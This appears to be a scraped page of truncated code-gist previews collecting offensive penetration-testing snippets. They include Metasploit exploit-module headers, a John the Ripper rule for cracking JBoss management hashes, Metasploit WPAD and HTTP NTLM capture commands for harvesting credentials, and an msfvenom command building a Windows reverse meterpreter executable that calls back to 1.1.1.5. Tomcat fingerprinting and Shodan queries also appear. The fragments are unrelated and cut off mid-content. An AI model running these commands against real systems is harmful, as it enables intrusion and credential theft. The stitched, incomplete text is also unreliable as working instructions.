This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
class MetasploitModule < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::HttpClient |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::HttpClient |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
///////////////////////////////////////////////////////////////////////////////////////////// | |
Add these lines to JtR /run/dynamic.conf: | |
///////////////////////////////////////////////////////////////////////////////////////////// | |
[List.Generic:dynamic_1591] | |
Expression=md5($u:ManagementRealm:$p) | |
CONST1=:ManagementRealm: | |
Flag=MGF_USERNAME | |
Flag=MGF_NOTSSE2Safe | |
Func=DynamicFunc__clean_input | |
Func=DynamicFunc__append_userid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://wtfismyip.com/ | |
http://web-sniffer.net/ | |
http://www.urlquery.net/ | |
http://www.rexswain.com/httpview.html | |
http://httpbin.org | |
http://requestb.in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use auxiliary/server/wpad | |
set PROXY x.x.x.x | |
run | |
use auxiliary/server/capture/http_ntlm | |
set CAINPWFILE /root/cain.http.pw | |
set JOHNPWFILE /root/john.http.pw | |
set URIPATH / | |
set SRVPORT 80 | |
run |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
3999,5000,5005,8000,8453,8787-8788,9001,18000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.../metasploit_4.11.3-2015062101-1kali0_i386.deb | |
root@kali:~# msfvenom -p windows/meterpreter_reverse_http exitfunc=thread lhost=1.1.1.5 R -a x86 -f exe --platform windows > meter_1.1.1.5.exe | |
No encoder or badchars specified, outputting raw payload |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//tomcat version | |
get and unzip $TOMCAT_HOME/server/lib/catalina.jar | |
cat org/apache/catalina/util/ServerInfo.properties | |
cat META-INF/MANIFEST.MF | |
grep -ri version * | more | |
(...) | |
META-INF/MANIFEST.MF:Specification-Version: 6.0 | |
META-INF/MANIFEST.MF:Implementation-Version: 6.0.35 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
» city | |
» country | |
nginx city:"San Diego" country:US | |
» geo | |
Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50 | |
» hostname | |
"Server: gws" hostname:google | |
» net | |
net:216.219.0.0/16 | |
» os |
NewerOlder